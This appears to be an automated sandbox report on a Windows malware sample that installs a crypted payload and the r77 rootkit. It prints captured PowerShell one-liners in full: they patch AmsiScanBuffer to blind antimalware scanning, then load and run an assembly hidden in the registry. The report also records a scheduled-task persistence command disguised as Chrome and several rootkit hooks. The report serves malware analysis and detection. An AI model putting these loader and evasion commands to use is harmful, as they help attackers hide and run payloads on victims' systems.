Source: Binary string: H:\CRYPTOCOIN\rootkit\r77-rootkit-master\vs\InstallStager\obj\x64\Release\InstallStager.pdb source: 34432.exe, 00000004.00000002.361388892.0000000013A39000.00000004.00000800.00020000.00000000.sdmp, 34432.exe, 00000004.00000002.360948518.0000000013998000.00000004.00000800.00020000.00000000.sdmp, 34432.exe, 00000004.00000002.356818562.00000000039A9000.00000004.00000800.00020000.00000000.sdmp, 34432.exe, 00000004.00000002.356782565.0000000003991000.00000004.00000800.00020000.00000000.sdmp, 34432.exe, 00000004.00000003.333426645.000000001C445000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.468321947.000002C8EBC93000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: N\rootkit\r77-rootkit-master\vs\x64\Release\r77-x64.pdb source: svchost.exe
Source: Binary string: C:\projects\dotnetzip-semverd\src\Zip\obj\Release\DotNetZip.pdb source: ChiefKeefofficialnaxyi_crypted(6).exe, 00000002.00000002.225232923.0000000000113000.00000004.00000010.00020000.00000000.sdmp, ChiefKeefofficialnaxyi_crypted(6).exe, 00000002.00000003.224694291.0000000002672000.00000040.00001000.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.505647974.0000000000402000.00000020.00000400.00020000.00000000.sdmp
Source: Binary string: H:\CRYPTOCOIN\rootkit\r77-rootkit-master\vs\x64\Release\r77-x64.pdb source: svchost.exe
Source: Binary string: RYPTOCOIN\rootkit\r77-rootkit-master\vs\x64\Release\r77-x64.pdb source: svchost.exe

Data Obfuscation

Source: 2.3.ChiefKeefofficialnaxyi_crypted(6).exe.2670000.0.unpack, u0003u2001.cs .Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.2.AppLaunch.exe.400000.0.unpack, u0003u2001.cs .Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Powershell logging: NewEngineState=Availablefunction Local:JcVEStQtPhkP{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$jwjRgZFzaeZBQB,[Parameter(Position=1)][Type]$jXrdWylJno)$JkETjFsAcrF=[AppDomain]::CurrentD
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Powershell logging: function Local:oBYZxpoBuJDg{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$hCPAJCDcAnFqJq,[Parameter(Position=1)][Type]$NibVxWxTFc)$qKHXRLjxcQb=[AppDomain]::CurrentDomain.DefineDynamicAssem
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Powershell logging: $global:?function Local:JcVEStQtPhkP{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$jwjRgZFzaeZBQB,[Parameter(Position=1)][Type]$jXrdWylJno)$JkETjFsAcrF=[AppDomain]::CurrentDomain.DefineDyn
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Powershell logging: $global:?function Local:JcVEStQtPhkP{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$jwjRgZFzaeZBQB,[Parameter(Position=1)][Type]$jXrdWylJno)$JkETjFsAcrF=[AppDomain]::CurrentDomain.DefineDyn
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Powershell logging: $global:?function Local:JcVEStQtPhkP{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$jwjRgZFzaeZBQB,[Parameter(Position=1)][Type]$jXrdWylJno)$JkETjFsAcrF=[AppDomain]::CurrentDomain.DefineDyn
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Powershell logging: $global:?function Local:JcVEStQtPhkP{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$jwjRgZFzaeZBQB,[Parameter(Position=1)][Type]$jXrdWylJno)$JkETjFsAcrF=[AppDomain]::CurrentDomain.DefineDyn
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Powershell logging: $global:?function Local:JcVEStQtPhkP{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$jwjRgZFzaeZBQB,[Parameter(Position=1)][Type]$jXrdWylJno)$JkETjFsAcrF=[AppDomain]::CurrentDomain.DefineDyn
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Powershell logging: $global:?function Local:JcVEStQtPhkP{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$jwjRgZFzaeZBQB,[Parameter(Position=1)][Type]$jXrdWylJno)$JkETjFsAcrF=[AppDomain]::CurrentDomain.DefineDyn
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell logging: function Local:JcVEStQtPhkP{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$jwjRgZFzaeZBQB,[Parameter(Position=1)][Type]$jXrdWylJno)$JkETjFsAcrF=[AppDomain]::CurrentDomain.DefineDynamicAssem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell logging: {$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}function Local:JcVEStQtPhkP{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$jwjRgZFzaeZBQB,[Parameter(Position=1)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell logging: function Local:JcVEStQtPhkP{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$jwjRgZFzaeZBQB,[Parameter(Position=1)][Type]$jXrdWylJno)$JkETjFsAcrF=[AppDomain]::CurrentDomain.DefineDynamicAssem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell logging: {$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}function Local:JcVEStQtPhkP{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$jwjRgZFzaeZBQB,[Parameter(Position=1)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell logging: $global:?function Local:oBYZxpoBuJDg{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$hCPAJCDcAnFqJq,[Parameter(Position=1)][Type]$NibVxWxTFc)$qKHXRLjxcQb=[AppDomain]::CurrentDomain.DefineDyn
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell logging: $global:?function Local:oBYZxpoBuJDg{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$hCPAJCDcAnFqJq,[Parameter(Position=1)][Type]$NibVxWxTFc)$qKHXRLjxcQb=[AppDomain]::CurrentDomain.DefineDyn
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell logging: $global:?function Local:oBYZxpoBuJDg{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$hCPAJCDcAnFqJq,[Parameter(Position=1)][Type]$NibVxWxTFc)$qKHXRLjxcQb=[AppDomain]::CurrentDomain.DefineDyn
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell logging: $global:?function Local:oBYZxpoBuJDg{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$hCPAJCDcAnFqJq,[Parameter(Position=1)][Type]$NibVxWxTFc)$qKHXRLjxcQb=[AppDomain]::CurrentDomain.DefineDyn
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell logging: $global:?function Local:oBYZxpoBuJDg{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$hCPAJCDcAnFqJq,[Parameter(Position=1)][Type]$NibVxWxTFc)$qKHXRLjxcQb=[AppDomain]::CurrentDomain.DefineDyn
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell logging: $global:?function Local:oBYZxpoBuJDg{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$hCPAJCDcAnFqJq,[Parameter(Position=1)][Type]$NibVxWxTFc)$qKHXRLjxcQb=[AppDomain]::CurrentDomain.DefineDyn
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell logging: $global:?function Local:oBYZxpoBuJDg{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$hCPAJCDcAnFqJq,[Parameter(Position=1)][Type]$NibVxWxTFc)$qKHXRLjxcQb=[AppDomain]::CurrentDomain.DefineDyn
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell logging: $global:?function Local:oBYZxpoBuJDg{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$hCPAJCDcAnFqJq,[Parameter(Position=1)][Type]$NibVxWxTFc)$qKHXRLjxcQb=[AppDomain]::CurrentDomain.DefineDyn
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell logging: $global:?function Local:oBYZxpoBuJDg{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$hCPAJCDcAnFqJq,[Parameter(Position=1)][Type]$NibVxWxTFc)$qKHXRLjxcQb=[AppDomain]::CurrentDomain.DefineDyn
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell logging: $global:?function Local:oBYZxpoBuJDg{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$hCPAJCDcAnFqJq,[Parameter(Position=1)][Type]$NibVxWxTFc)$qKHXRLjxcQb=[AppDomain]::CurrentDomain.DefineDyn
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell logging: $global:?function Local:oBYZxpoBuJDg{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$hCPAJCDcAnFqJq,[Parameter(Position=1)][Type]$NibVxWxTFc)$qKHXRLjxcQb=[AppDomain]::CurrentDomain.DefineDyn
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell logging: function Local:JcVEStQtPhkP{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$jwjRgZFzaeZBQB,[Parameter(Position=1)][Type]$jXrdWylJno)$JkETjFsAcrF=[AppDomain]::CurrentDomain.DefineDynamicAssem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell logging: {$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}function Local:JcVEStQtPhkP{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$jwjRgZFzaeZBQB,[Parameter(Position=1)
Source: unknown Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:oBYZxpoBuJDg{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$hCPAJCDcAnFqJq,[Parameter(Position=1)][Type]$NibVxWxTFc)$qKHXRLjxcQb=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$qKHXRLjxcQb.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$hCPAJCDcAnFqJq).SetImplementationFlags('Runtime,Managed');$qKHXRLjxcQb.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$NibVxWxTFc,$hCPAJCDcAnFqJq).SetImplementationFlags('Runtime,Managed');Write-Output $qKHXRLjxcQb.CreateType();}$uYKrZWxknTiUv=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$SpNyfScDlNPPHB=$uYKrZWxknTiUv.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$RRmRtbQVOsCwqbtFCRP=oBYZxpoBuJDg @([String])([IntPtr]);$CSrLsWTvUKtnfJeCoYnQHQ=oBYZxpoBuJDg 
@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$LbwxtlPJWDL=$uYKrZWxknTiUv.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$UsbtvKZkuSsHuw=$SpNyfScDlNPPHB.Invoke($Null,@([Object]$LbwxtlPJWDL,[Object]('Load'+'LibraryA')));$GBWVSxTZRtiWMYLEL=$SpNyfScDlNPPHB.Invoke($Null,@([Object]$LbwxtlPJWDL,[Object]('Vir'+'tual'+'Pro'+'tect')));$zcmbglj=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($UsbtvKZkuSsHuw,$RRmRtbQVOsCwqbtFCRP).Invoke('a'+'m'+'si.dll');$NtWqUAjxRFzIehWzj=$SpNyfScDlNPPHB.Invoke($Null,@([Object]$zcmbglj,[Object]('Ams'+'iSc'+'an'+'Buffer')));$QZnCEHiAlz=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GBWVSxTZRtiWMYLEL,$CSrLsWTvUKtnfJeCoYnQHQ).Invoke($NtWqUAjxRFzIehWzj,[uint32]8,4,[ref]$QZnCEHiAlz);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$NtWqUAjxRFzIehWzj,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GBWVSxTZRtiWMYLEL,$CSrLsWTvUKtnfJeCoYnQHQ).Invoke($NtWqUAjxRFzIehWzj,[uint32]8,0x20,[ref]$QZnCEHiAlz);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('nslookstager')).EntryPoint.Invoke($Null,$Null)"
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:JcVEStQtPhkP{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$jwjRgZFzaeZBQB,[Parameter(Position=1)][Type]$jXrdWylJno)$JkETjFsAcrF=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$JkETjFsAcrF.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$jwjRgZFzaeZBQB).SetImplementationFlags('Runtime,Managed');$JkETjFsAcrF.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$jXrdWylJno,$jwjRgZFzaeZBQB).SetImplementationFlags('Runtime,Managed');Write-Output $JkETjFsAcrF.CreateType();}$lPmVEIqLxWSBJ=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$oknnqNPEawtCof=$lPmVEIqLxWSBJ.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$PfTqTVeTqNbzEtTZAwA=JcVEStQtPhkP @([String])([IntPtr]);$FBhryrsEcCEQMAYVVFmrjj=JcVEStQtPhkP 
@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$gdWNaSIjpXI=$lPmVEIqLxWSBJ.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$MwCkRVFOfjwTFV=$oknnqNPEawtCof.Invoke($Null,@([Object]$gdWNaSIjpXI,[Object]('Load'+'LibraryA')));$PwfBMMcphOddVTLUY=$oknnqNPEawtCof.Invoke($Null,@([Object]$gdWNaSIjpXI,[Object]('Vir'+'tual'+'Pro'+'tect')));$FyAgKxj=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($MwCkRVFOfjwTFV,$PfTqTVeTqNbzEtTZAwA).Invoke('a'+'m'+'si.dll');$GiLFGjttEZsjytHxc=$oknnqNPEawtCof.Invoke($Null,@([Object]$FyAgKxj,[Object]('Ams'+'iSc'+'an'+'Buffer')));$XarcXAurwd=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($PwfBMMcphOddVTLUY,$FBhryrsEcCEQMAYVVFmrjj).Invoke($GiLFGjttEZsjytHxc,[uint32]8,4,[ref]$XarcXAurwd);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$GiLFGjttEZsjytHxc,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($PwfBMMcphOddVTLUY,$FBhryrsEcCEQMAYVVFmrjj).Invoke($GiLFGjttEZsjytHxc,[uint32]8,0x20,[ref]$XarcXAurwd);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('nslookstager')).EntryPoint.Invoke($Null,$Null)"
Source: C:\Users\user\AppData\Roaming\34432.exe Code function: 4_2_00007FFF7E40070C pushad ; ret 4_2_00007FFF7E40070E
Source: C:\Users\user\AppData\Roaming\34432.exe Code function: 4_2_00007FFF7E4006CE pushad ; ret 4_2_00007FFF7E4006D0
Source: C:\Users\user\AppData\Roaming\34432.exe Code function: 4_2_00007FFF7E4035CF push cs; iretd 4_2_00007FFF7E4035D1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FFF7E3F7317 push ebx; iretd 8_2_00007FFF7E3F731A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FFF7E3F5097 push eax; iretd 8_2_00007FFF7E3F50A1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FFF7E3F44E7 push esp; retf 8_2_00007FFF7E3F44E8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FFF7E4C5274 pushad ; retf 8_2_00007FFF7E4C5275
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FFF7E4C5F76 push ebx; retf 8_2_00007FFF7E4C5F78
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FFF7E4C5C3C push esi; retf 8_2_00007FFF7E4C5C3D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FFF7E4C6156 push ecx; retf 8_2_00007FFF7E4C6158
Source: C:\Windows\System32\nslookup.exe Code function: 22_2_000000014000E228 push rax; retf 22_2_000000014000E229
Source: C:\Windows\System32\nslookup.exe Code function: 22_2_000000014001439D push rcx; retf 003Fh 22_2_000000014001439E
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_00007FFF7E3E6450 push ebx; iretd 25_2_00007FFF7E3E645A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 25_2_00007FFF7E3E41C7 push esp; retf 25_2_00007FFF7E3E41C8
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe Code function: 30_2_00007FFF7E3F070C pushad ; ret 30_2_00007FFF7E3F070E
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe Code function: 30_2_00007FFF7E3F06CE pushad ; ret 30_2_00007FFF7E3F06D0
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe Code function: 30_2_00007FFF7E3F70FA push ebp; retf 30_2_00007FFF7E3F70FB
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe Code function: 30_2_00007FFF7E3F35CF push cs; iretd 30_2_00007FFF7E3F35D1
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe Code function: 33_2_00007FFF7E40070C pushad ; ret 33_2_00007FFF7E40070E
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe Code function: 33_2_00007FFF7E4006CE pushad ; ret 33_2_00007FFF7E4006D0
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe Code function: 33_2_00007FFF7E4035CF push cs; iretd 33_2_00007FFF7E4035D1
Source: C:\Windows\System32\dllhost.exe Code function: 39_2_00000001400146AD push rcx; retf 003Fh 39_2_00000001400146AE
Source: C:\Windows\System32\dllhost.exe Code function: 39_2_000000014000E348 push rax; retf 39_2_000000014000E351
Source: C:\Windows\System32\dllhost.exe Code function: 39_2_000000014000E350 push rax; retf 39_2_000000014000E351
Source: C:\Windows\System32\winlogon.exe Code function: 42_2_000001AFDDCE94CD push rcx; retf 003Fh 42_2_000001AFDDCE94CE
Source: C:\Windows\System32\winlogon.exe Code function: 42_2_000001AFDDD142D8 push rax; retf 42_2_000001AFDDD142D9
Source: C:\Windows\System32\winlogon.exe Code function: 42_2_000001AFDDD1A6CD push rcx; retf 003Fh 42_2_000001AFDDD1A6CE
Source: C:\Windows\System32\lsass.exe Code function: 44_2_00000240B2B994CD push rcx; retf 003Fh 44_2_00000240B2B994CE
Source: C:\Windows\System32\lsass.exe Code function: 44_2_00000240B2BC42D8 push rax; retf 44_2_00000240B2BC42D9
Source: C:\Windows\System32\svchost.exe Code function: 47_2_000001CAF3CE94CD push rcx; retf 003Fh 47_2_000001CAF3CE94CE
Source: C:\Windows\System32\svchost.exe Code function: 47_2_000001CAF3D142D0 push rax; retf 47_2_000001CAF3D142D9
Source: ChiefKeefofficialnaxyi_crypted(6).exe.1.dr Static PE information: section name: .nQuHRq
Source: ChiefKeefofficialnaxyi_crypted(6).exe.1.dr Static PE information: section name: .9SAT
Source: initial sample Static PE information: section name: .9SAT entropy: 6.83589844593

Persistence and Installation Behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Source: C:\Users\user\Desktop\Install.exe File created: C:\Users\user\AppData\Roaming\ChiefKeefofficialnaxyi_crypted(6).exe
Source: C:\Users\user\AppData\Roaming\34432.exe File created: C:\Users\user\AppData\Roaming\Chrome\chrome.exe
Source: C:\Users\user\Desktop\Install.exe File created: C:\Users\user\AppData\Roaming\34432.exe

Boot Survival

Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "chrome" /tr "C:\Users\user\AppData\Roaming\Chrome\chrome.exe"
Source: C:\Windows\System32\nslookup.exe File created: C:\Windows\Tasks\nslooksvc32.job

Hooking and other Techniques for Hiding and Protection

Source: explorer.exe IAT, EAT, inline or SSDT hook detected: function: ZwEnumerateValueKey
Source: explorer.exe IAT, EAT, inline or SSDT hook detected: function: NtQuerySystemInformation
Source: explorer.exe IAT, EAT, inline or SSDT hook detected: function: NtQueryDirectoryFile
Source: explorer.exe User mode code has changed: module: ntdll.dll function: ZwEnumerateKey new code: 0xE9 0x93 0x33 0x35 0x5D 0xDF
Source: C:\Windows\System32\nslookup.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node nslookstager
Source: C:\Windows\System32\winlogon.exe Code function: 42_2_000001AFDDD01F20 GetCurrentThread,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress, 42_2_000001AFDDD01F20
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Users\user\Desktop\Install.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\34432.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
